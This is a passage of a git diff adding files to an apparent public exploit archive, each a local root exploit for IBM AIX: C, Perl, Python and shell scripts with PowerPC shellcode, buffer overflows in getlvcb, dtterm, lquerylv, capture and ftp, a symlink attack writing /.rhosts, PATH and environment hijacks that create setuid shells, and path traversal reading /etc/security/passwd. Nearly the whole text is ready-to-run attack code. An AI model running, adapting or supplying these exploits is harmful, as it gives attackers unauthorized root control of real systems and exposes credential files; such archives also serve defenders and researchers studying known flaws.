$SHELL.="\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh\xff";
return $SHELL;
}
#EOF

178
platforms/aix/local/23841.c Executable file
View file

@ -0,0 +1,178 @@
source: http://www.securityfocus.com/bid/9905/info
getlvcb has been reported to be prone to a buffer overflow vulnerability.
When an argument is passed to the getlvcb utility, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the root user.
An attacker will require system group privileges prior to the execution of the getlvcb utility, the attacker may exploit the issue described in BID 9903 in order to gain the necessary privileges required to exploit this vulnerability.
/********************************************************************
* Secure Network Operations (http://www.secnetops.com)
* Local AIX getlvcb Exploit
* by: mattox@secnetops.com
* Program Description:
*
* Vulnerability Details:
*
* # gdb -q /usr/sbin/getlvcb
* (no debugging symbols found)...(gdb) set args `perl -e 'print "A" x 183'`ABCD
* (gdb) r
* Starting program: /usr/sbin/getlvcb `perl -e 'print "A" x 183'`ABCD
*
* Program received signal SIGSEGV, Segmentation fault.
* 0x41424344 in ?? ()
* (gdb) bt
* #0 0x41424344 in ?? ()
* (gdb) i r
* r0 0x6000328e 1610625678
* r1 0x2ff228a0 804399264
* r2 0xf012de88 -267198840
* r3 0x1 1
* r4 0x9 9
* r5 0x2ff22ff8 804401144
* r6 0xd030 53296
* r7 0x0 0
* r8 0x60000000 1610612736
* r9 0x600039ce 1610627534
* r10 0x0 0
* r11 0x6000214a 1610621258
* r12 0x41424344 1094861636
* r13 0x200008b0 536873136
* r14 0x0 0
* r15 0x0 0
* r16 0x0 0
* r17 0x0 0
* r18 0x0 0
* r19 0x0 0
* r20 0x0 0
* r21 0x0 0
* r22 0x0 0
* r23 0x0 0
* r24 0x0 0
* r25 0x0 0
* r26 0x0 0
* r27 0x0 0
* r28 0x41414141 1094795585
* r29 0x41414141 1094795585
* r30 0x41414141 1094795585
* r31 0x41414141 1094795585
* pc 0x41424344 1094861636
* ps 0x4000d030 1073795120
* cr 0x26222444 639771716
* lr 0x41424344 1094861636
* ctr 0x0 0
* xer 0x0 0
* fpscr 0x0 0
* vscr 0x0 0
* vrsave 0x0 0
*
* .............................................................
* $ uname -a
* AIX thunderfoot 1 5 002064864C00
*
* $ whoami
* kinet1k
*
* $ id
* uid=7(kinet1k) gid=1(staff) groups=0(system)
* $ ./r00tme 208 231
*
* Secure Network Operations (written by: mattox@secnetops.com)
* AIX Local getlvncb exploit
*
* Fixin to overwrite the address: 0x2ff2283d
* Using a buffer size of: 208
* And an offset of: 231
*
* # whoami
* root
*
* # id
* uid=0(root) gid=1(staff) groups=0(system)
*..............................................................
*
*********************************************************************/
#include <stdlib.h>
#include <string.h>
#define OFFSET 0
#define BUFFERSIZE 208
#define NOP "\x7c\xa5\x2a\x79"
#define RETURNADDR 0x2ff22924
char shellcode[ ] =
"\x7e\x94\xa2\x79\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\xb6\x05\xff\xff\x7e\x94\xa2\x79"
"\x7e\x84\xa3\x78\x40\x82\xff\xfd\x7e\xa8\x02\xa6\x3a\xb5\x01\x40"
"\x88\x55\xfe\xe0\x7e\x83\xa3\x78\x3a\xd5\xfe\xe4\x7e\xc8\x03\xa6"
"\x4c\xc6\x33\x42\x44\xff\xff\x02\xb7\x05\xff\xff\x38\x75\xff\x04"
"\x38\x95\xff\x0c\x7e\x85\xa3\x78\x90\x75\xff\x0c\x92\x95\xff\x10"
"\x88\x55\xfe\xe1\x9a\x95\xff\x0b\x4b\xff\xff\xd8/bin/sh";
int main( int argc, char *argv[ ] )
{
int i;
int offset = OFFSET, bufferSize = BUFFERSIZE;
unsigned long esp, returnAddress, *addressPointer;
char *buffer, *pointer;
/* Usage */
if( argv[ 1 ] ) {
if( strncmp( argv[ 1 ], "-h", 3 ) == 0 || strncmp( argv[ 1 ], "-H", 3 ) == 0 ) {
printf( "\n\tUsage: %s <buffer size> <offset>\n\n", argv[ 0 ] );
exit( 0 );
}
}
if( argc > 1 ) {
bufferSize = atoi( argv[ 1 ] );
}
if( argc > 2 ) {
offset = atoi( argv[ 2 ] );
}
returnAddress = RETURNADDR - offset;
printf( "\nSecure Network Operations (written by: mattox@secnetops.com)\n" );
printf( "AIX Local getlvncb exploit\n\n" );
printf( "Fixin to overwrite the address: 0x%x\n", returnAddress );
printf( "Using a buffer size of: %i\n", bufferSize );
printf( "And an offset of: %i\n", offset );
if( !( buffer = malloc( bufferSize ) ) ) {
printf( "Coundn't allocate memory.\n" );
exit( 0 );
}
/* I know, this is weird stuff...had to sub odd number to get ret addy to align */
pointer = buffer - 1;
addressPointer = ( long * )pointer;
for( i = 0; i < bufferSize; i+=4 ) {
*( addressPointer++ ) = returnAddress;
}
for( i = 0; i < ( bufferSize / 2 ); i+=4 ) {
buffer[ i ] = ( unsigned long )NOP;
}
pointer = buffer + ( ( bufferSize / 2 ) - ( strlen( shellcode )/2 ) );
for( i = 0; i < strlen( shellcode ); i++ ) {
*( pointer++ ) = shellcode[ i ];
}
buffer[ bufferSize - 1 ] = '\0';
execl( "/usr/sbin/getlvcb", "getlvcb", buffer, 0 );
free( buffer );
return 0;
}

43
platforms/aix/local/23883.pl Executable file
View file

@ -0,0 +1,43 @@
source: http://www.securityfocus.com/bid/9982/info
Reportedly AIX invscoutd insecurely handles temporary files; this may allow a local attacker to destroy data on vulnerable system. This issue is due to a design error that allows a user to specify a log file that the process writes to while holding escalated privileges.
This issue may allow a malicious user to corrupt arbitrary files on the affected system, potentially leading to a system wide denial of service condition. It has also been conjectured that this issue may be leveraged to allow an attacker to gain escalated privileges, although this is unconfirmed.
#!/usr/bin/perl
# FileName: x_invscoutd.pl
# Exploit invscoutd of Aix4.x & 5L to get a uid=0 shell.
# Tested : on Aix4.3.3 & Aix5.1.
# Some high version of invscoutd is not affected.
# Author : watercloud@xfocus.org
# Site : www.xfocus.org www.xfocus.net
# Date : 2003-5-29
# Announce: use as your owner risk!
$LOG="/tmp/.ex/.hello\n+ +\nworld";
$CMD="/usr/sbin/invscoutd";
umask 022;
mkdir "/tmp/.ex",0777;
print "Exploit error on kill process invscoutd !!" ,exit 1
if &killproc() == 0;
symlink "/.rhosts",$LOG;
system $CMD,"-p7321",$LOG; &killproc();
unlink $LOG;
print "\n============\nRemember to remove /.rhosts !!\n";
print "rsh localhost -l root '/bin/sh -i'\n";
print "waiting . . . . . .\n";
system "rsh","localhost","-l","root","/bin/sh -i";
system $CMD,"-p808","/dev/null" ; &killproc();
rmdir "/tmp/.ex";
sub killproc() {
$_=`ps -ef |grep invscoutd |grep -v grep |grep -v perl`;
@proc_lst=split;
$ret=kill 9,$proc_lst[1] if $proc_lst[1];
$ret=-1 if ! defined $ret;
return $ret;
}
#EOF

17
platforms/aix/local/25039.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/12041/info
diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable.
A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software.
mkdirhier /tmp/aap/bin
export DIAGNOSTICS=/tmp/aap
cat > /tmp/aap/bin/Dctrl << EOF
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
EOF
chmod a+x /tmp/aap/bin/Dctrl
lsmcode
/tmp/.shh

7
platforms/aix/local/26996.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/16102/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory

11
platforms/aix/local/26997.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/16103/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer.
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh
ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$

66
platforms/aix/local/28507.sh Executable file
View file

@ -0,0 +1,66 @@
#
# EDB Note: Screenshot provided by exploit author
#
#!/bin/sh
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation
# Date: 2013-09-24
# Exploit Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com>
# Vendor Homepage: http://www.ibm.com
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02
# Tested on: IBM AIX 6.1
# CVE: CVE-2013-4011
echo '
mm mmmmm m m
## # # #
# # # ##
#mm# # m""m
# # mm#mm m" "m
'
echo "[*] AIX root privilege escalation"
echo "[*] Kristian Erik Hermansen"
echo "[*] https://linkedin.com/in/kristianhermansen"
echo "
+++++?????????????~.:,.:+???????????++++
+++++???????????+...:.,.,.=??????????+++
+++???????????~.,:~=~:::..,.~?????????++
+++???????????:,~==++++==~,,.?????????++
+++???????????,:=+++++++=~:,,~????????++
++++?????????+,~~=++++++=~:,,:????????++
+++++????????~,~===~=+~,,::,:+???????+++
++++++???????=~===++~~~+,,~::???????++++
++++++++?????=~=+++~~~:++=~:~+???+++++++
+++++++++????~~=+++~+=~===~~:+??++++++++
+++++++++?????~~=====~~==~:,:?++++++++++
++++++++++????+~==:::::=~:,+??++++++++++
++++++++++?????:~~=~~~~~::,??+++++++++++
++++++++++?????=~:~===~,,,????++++++++++
++++++++++???+:==~:,,.:~~..+??++++++++++
+++++++++++....==+===~~=~,...=?+++++++++
++++++++,........~=====..........+++++++
+++++................................++=
=+:....................................=
"
TMPDIR=/tmp
TAINT=${TMPDIR}/arp
RSHELL=${TMPDIR}/r00t-sh
cat > ${TAINT} <<-!
#!/bin/sh
cp /bin/sh ${RSHELL}
chown root ${RSHELL}
chmod 4555 ${RSHELL}
!
chmod 755 ${TAINT}
PATH=.:${PATH}
export PATH
cd ${TMPDIR}
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null
if [ -e ${RSHELL} ]; then
echo "[+] Access granted. Don't be evil..."
${RSHELL}
else
echo "[-] Exploit failed. Try some 0day instead..."
fi

160
platforms/aix/local/333.c Executable file
View file

@ -0,0 +1,160 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/dt/bin/dtterm";
char prog2[30]="dtterm";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* return address */
int corr=1000;
char *args[4];
char *arg1="-ms";
char *newenv[8];
int startwith=0;
mn=200;
max=300;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
/* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Just frame pointers */
puts("Start...");/*Here we go*/
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711*/
}
/*-------sometimes this helps-----------------------
#!/bin/ksh
L=20
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 144`
./a.out $L
done
/str0ke
*/
// milw0rm.com [1997-05-27]

161
platforms/aix/local/335.c Executable file
View file

@ -0,0 +1,161 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/sbin/lquerylv";
char prog2[30]="lquerylv";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int ch;
unsigned int reta; /* return address */
int corr=4600;
char *args[4];
char *arg1="-L";
char *newenv[8];
int startwith=0;
mn=100;
max=280;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) & 0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
/* 4 vars 'cause the correct one should be aligned at 4bytes boundary */
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=NULL;
args[0]=prog2;
args[1]=arg1;
args[2]=(char*)&frame[0]; /* Just frame pointers */
puts("Start...");/*Here we go*/
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
*/
}
/*
----------cut here---------
----------sometimes this helps-----------------
#!/bin/ksh
L=100
O=40
while [ $L -lt 12000 ]
do
echo $L
L=`expr $L + 42`
./a.out $L
done */
// milw0rm.com [1997-05-26]

178
platforms/aix/local/4231.c Executable file
View file

@ -0,0 +1,178 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX capture Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/capture"
#define VALCNT 40
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512], bsh[128], buf[1024];
char *args[] = { TARGET, "/dev/null", NULL };
char *envs[] = { pad, bsh, egg, NULL };
int ptm, pts, pi[2];
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
sprintf(bsh, "SHELL=/proc/%d/object/a.out", getpid());
addr = get_addr(argv, envp, args, envs);
if (!envp[0]) {
dup2(3, 0);
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
} else if (argc && !strcmp(argv[0], "bsh")) {
char i, ch;
printf("\x1b[");
for (i = 0; i < VALCNT; i++)
printf("%lu;", addr);
printf("0A\n");
fflush(stdout);
while (read(0, &ch, 1) == 1)
write(1, &ch, 1);
exit(0);
}
printf("--------------------------------\n");
printf(" AIX capture Local Root Exploit\n");
printf(" By qaaz\n");
printf("--------------------------------\n");
if (pipe(pi) < 0) {
perror("[-] pipe");
exit(1);
}
if ((ptm = open("/dev/ptc", O_RDWR)) < 0 ||
(pts = open(ttyname(ptm), O_RDWR)) < 0) {
perror("[-] pty");
exit(1);
}
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pts, 0);
dup2(pts, 1);
dup2(pts, 2);
dup2(pi[0], 3);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
close(pi[0]);
close(pts);
sleep(1);
read(ptm, buf, sizeof(buf));
write(ptm, " ", 1);
shell((int[2]) { 0, pi[1] }, (int[2]) { ptm, 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]

29
platforms/aix/local/4232.sh Executable file
View file

@ -0,0 +1,29 @@
#!/bin/sh
#
# 07/2007: public release
# IBM AIX <= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat >piolib.c <<_EOF_
#include <stdlib.h>
#include <unistd.h>
void init() __attribute__ ((constructor));
void init()
{
seteuid(0);
setuid(0);
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", (void *) 0);
execl("/bin/sh", "sh", "-i", (void *) 0);
perror("execl");
exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib
# milw0rm.com [2007-07-27]

157
platforms/aix/local/4233.c Executable file
View file

@ -0,0 +1,157 @@
/* 07/2007: public release
* IBM AIX <= 5.3 sp6
*
* AIX ftp Local Root Exploit
* By qaaz
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/select.h>
#define TARGET "/usr/bin/ftp"
#define OVERLEN 300
#define MAX(x,y) ((x) > (y) ? (x) : (y))
#define ALIGN(x,y) (((x) + (y) - 1) / (y) * (y))
unsigned char qaazcode[] =
"\x60\x60\x60\x60\x60\x60\x60\x60"
"\x7c\x63\x1a\x79\x40\x82\xff\xfd"
"\x7e\xa8\x02\xa6\x3a\xb5\x01\x01"
"\x88\x55\xff\x5b\x3a\xd5\xff\x1b"
"\x7e\xc8\x03\xa6\x4c\xc6\x33\x42"
"\x44\xff\xff\x02\x38\x75\xff\x5f"
"\x38\x63\x01\x01\x88\x95\xff\x5d"
"\x38\x63\x01\x02\x38\x63\xfe\xff"
"\x88\xa3\xfe\xff\x7c\x04\x28\x40"
"\x40\x82\xff\xf0\x7c\xa5\x2a\x78"
"\x98\xa3\xfe\xff\x88\x55\xff\x5c"
"\x38\x75\xff\x5f\x38\x81\xff\xf8"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x4b\xff\xff\xbd\xb8\x05\x7c\xff";
void shell(int p1[2], int p2[2])
{
ssize_t n;
fd_set rset;
char buf[4096];
for (;;) {
FD_ZERO(&rset);
FD_SET(p1[0], &rset);
FD_SET(p2[0], &rset);
n = select(MAX(p1[0], p2[0]) + 1,
&rset, NULL, NULL, NULL);
if (n < 0) {
perror("[-] select");
break;
}
if (FD_ISSET(p1[0], &rset)) {
n = read(p1[0], buf, sizeof(buf));
if (n <= 0) break;
write(p1[1], buf, n);
}
if (FD_ISSET(p2[0], &rset)) {
n = read(p2[0], buf, sizeof(buf));
if (n <= 0) break;
write(p2[1], buf, n);
}
}
}
/* just because you don't understand it doesn't mean it has to be wrong */
ulong get_addr(char *argv[], char *envp[], char *args[], char *envs[])
{
ulong top, len, off;
int i;
len = 0;
for (i = 0; argv[i]; i++)
len += strlen(argv[i]) + 1;
for (i = 0; envp[i]; i++)
len += strlen(envp[i]) + 1;
top = (ulong) argv[0] + ALIGN(len, 8);
len = off = 0;
for (i = 0; args[i]; i++)
len += strlen(args[i]) + 1;
for (i = 0; envs[i]; i++) {
if (!strncmp(envs[i], "EGG=", 4))
off = len + 4;
len += strlen(envs[i]) + 1;
}
while (off & 3)
strcat(envs[0], "X"), off++, len++;
return top - ALIGN(len, 4) + off;
}
int main(int argc, char *argv[], char *envp[])
{
char pad[16] = "PAD=X", egg[512];
char *args[] = { TARGET, NULL };
char *envs[] = { pad, egg, NULL };
int pi[2], po[2], i;
pid_t child;
ulong addr;
sprintf(egg, "EGG=%s/proc/%d/object/a.out|", qaazcode, getpid());
if (!envp[0]) {
setuid(geteuid());
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
execl("/bin/sh", "sh", "-i", NULL);
perror("[-] execl");
exit(1);
}
printf("----------------------------\n");
printf(" AIX ftp Local Root Exploit\n");
printf(" By qaaz\n");
printf("----------------------------\n");
if (pipe(pi) < 0 || pipe(po) < 0) {
perror("[-] pipe");
exit(1);
}
addr = get_addr(argv, envp, args, envs);
if ((child = fork()) < 0) {
perror("[-] fork");
exit(1);
}
if (child == 0) {
dup2(pi[0], 0);
dup2(po[1], 1);
dup2(po[1], 2);
execve(TARGET, args, envs);
perror("[-] execve");
exit(1);
}
write(pi[1], "macdef foo\n\n$\nfoo ab", 20);
for (i = 0; i < OVERLEN; i += sizeof(addr))
write(pi[1], &addr, sizeof(addr));
write(pi[1], "\n", 1);
fflush(stdout);
fflush(stderr);
close(pi[0]);
close(po[1]);
shell((int[2]) { 0, pi[1] }, (int[2]) { po[0], 1 });
kill(child, SIGTERM);
waitpid(child, NULL, 0);
return 0;
}
// milw0rm.com [2007-07-27]

27
platforms/aix/local/4612.py Executable file
View file

@ -0,0 +1,27 @@
#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254 )
#thomas.pollet@gmail.com
#
from os import execve
bof="a"*580+"bbbbccccdddd\x2f\xf2\x28\x2f"
egg="\x60"*2350
shellcode=( # by intropy <at> caughq.org
"\x7c\xa5\x2a\x79" # xor. r5,r5,r5
"\x40\x82\xff\xfd" # bnel <shellcode>
"\x7f\xe8\x02\xa6" # mflr r31
"\x3b\xff\x01\x20" # cal r31,0x120(r31)
"\x38\x7f\xff\x08" # cal r3,-248(r31)
"\x38\x9f\xff\x10" # cal r4,-240(r31)
"\x90\x7f\xff\x10" # st r3,-240(r31)
"\x90\xbf\xff\x14" # st r5,-236(r31)
"\x88\x5f\xff\x0f" # lbz r2,-241(r31)
"\x98\xbf\xff\x0f" # stb r5,-241(r31)
"\x4c\xc6\x33\x42" # crorc cr6,cr6,cr6
"\x44\xff\xff\x02" # svca
"/bin/sh"
"\x05")
execve("/usr/bin/passwd",[""],{"EGG":egg+shellcode,"LC_TIME":bof})
# milw0rm.com [2007-11-07]

72
platforms/aix/local/699.c Executable file
View file

@ -0,0 +1,72 @@
/* exploit for /usr/bin/paginit
tested on: AIX 5.2
if the exploit fails it's because the shellcode
ends up at a different address. use dbx to check,
and change RETADDR accordingly.
cees-bart <ceesb cs ru nl>
*/
